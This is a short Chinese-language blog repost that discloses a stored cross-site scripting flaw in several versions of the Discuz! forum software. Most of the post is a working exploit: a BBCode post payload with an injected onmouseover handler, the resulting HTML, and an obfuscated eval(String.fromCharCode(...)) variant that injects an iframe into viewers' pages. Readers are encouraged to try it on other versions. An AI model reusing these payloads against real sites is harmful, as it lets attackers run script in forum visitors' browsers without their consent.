Discuz!多版本 存儲型XSS腳本漏洞 (0day)
轉自:http://www.ayhacker.net/ayblog/read.php?94
其實這不是很新,Discuz 已經修正了,不過XSS對IE(9)還是有效
其實這不是很新,Discuz 已經修正了,不過XSS對IE(9)還是有效
2009年一次偶然間測試發現的此XSS漏洞,因為是存儲型的,我想大家應該知道它的危害吧。相隔這麼多年DZ不斷的更新版本,但此漏洞依然存在,今天就發佈出來吧!留著也沒什麼用會長毛的,呵呵。
在此我要感謝一下我的好朋友Jackal在09年的時候一起幫我測試漏洞的。
當時我們一起測試的是DZ6.0-DZ7.2,不知道是不是通殺啊。哈哈!沒有一個一個去測試。有條件的去測試一下吧。
發貼進入源碼模式,寫入如下的exp
[email][url][img]http://qhkest.com onmouseover=alert(/DZ-xss-0day/); [/img] [/url][/email]
附上XSS完的源碼如下:
<a href="mailto:"></a><a href="%5C%22http://qhkest.com" onmouseover="alert(/DZ-xss-0day/);" \"="" target="\"_blank\""><img src="http://qhkest.com%20onmouseover=alert%28/DZ-xss-0day/%29;" onload="thumbImg(this)" alt=""> </a><
漏洞證明:
本地測試結果:
Discuz! X2
以下應用華東耶穌的話:
[email][url][img]http://qhkest.com onmouseover=alert(/DZ-xss-0day/); [/img] [/url][/email]
把上面的alert(/DZ-XSS-0DAY/)
換成
eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112,108,97,
121,61,34,110,111,110,101,34,59,102,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,
101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,102,46,115,114,99,61,
34,104,116,116,112,58,47,47,119,119,119,46,98,97,34,43,34,105,100,117,46,99,111,109,34,59,
102,46,104,101,105,103,104,116,61,34,51,48,48,34,59,102,46,119,105,100,116,104,61,34,51,48,
48,34,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,
84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,
105,108,100,40,102,41,59))
鼠標觸碰效果:
加密過程,就是10進制加密啦,如圖。
解密下看下代碼。
作者: 黑病毒&qhkest &3hack
留言
張貼留言